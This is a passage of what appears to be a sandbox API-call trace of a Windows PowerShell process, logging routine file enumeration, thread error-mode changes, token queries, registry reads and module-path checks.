lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0286.188] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0286.188] FindNextFileW (in: hFindFile=0x25b73f775d0, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0286.188] FindClose (in: hFindFile=0x25b73f775d0 | out: hFindFile=0x25b73f775d0) returned 1 [0286.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.188] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0286.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0286.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0286.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0286.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0286.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0286.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0286.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0286.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0286.223] EtwEventActivityIdControl () returned 0x0 [0286.223] SetEvent (hEvent=0xa60) returned 1 [0286.224] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d330*=0xa60, lpdwindex=0x653ef8d104 | out: lpdwindex=0x653ef8d104) returned 0x0 [0286.224] GetCurrentProcess () returned 0xffffffffffffffff [0286.225] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x998) returned 1 [0286.227] GetTokenInformation (in: TokenHandle=0x998, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0286.227] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73f7b600 [0286.227] GetTokenInformation (in: TokenHandle=0x998, TokenInformationClass=0x1, TokenInformation=0x25b73f7b600, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73f7b600, ReturnLength=0x653ef8d6b8) returned 1 [0286.228] LocalFree (hMem=0x25b73f7b600) returned 0x0 [0286.228] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c3a1f38, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c3a1f38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0286.228] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa18, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0286.229] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0286.230] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8d6b8 | out: lpConsoleScreenBufferInfo=0x653ef8d6b8) returned 1 [0286.231] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8d6b8 | out: lpConsoleScreenBufferInfo=0x653ef8d6b8) returned 1 [0286.237] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x25b73f5b9b0*=0x94c, lpdwindex=0x653ef8d344 | out: lpdwindex=0x653ef8d344) returned 0x0 [0286.513] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f81370 [0286.513] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73f81370, nSize=0x105 | out: lpBuffer="") returned 0x97 [0286.513] CoTaskMemFree (pv=0x25b73f81370) [0286.513] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d708 | out: phkResult=0x653ef8d708*=0xa18) returned 0x0 [0286.514] RegQueryValueExW (in: hKey=0xa18, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d758, lpData=0x0, lpcbData=0x653ef8d750*=0x0 | out: lpType=0x653ef8d758*=0x1, lpData=0x0, lpcbData=0x653ef8d750*=0x56) returned 0x0 [0286.514] RegQueryValueExW (in: hKey=0xa18, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d758, lpData=0x25b5c153b50, lpcbData=0x653ef8d750*=0x56 | out: lpType=0x653ef8d758*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8d750*=0x56) returned 0x0 [0286.514] RegCloseKey (hKey=0xa18) returned 0x0 [0286.514] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0286.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d720) returned 1 [0286.514] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d800 | out: lpFileInformation=0x653ef8d800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0286.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d6e0) returned 1 [0286.516] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0286.531] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0286.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d720) returned 1 [0286.532] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d800 | out: 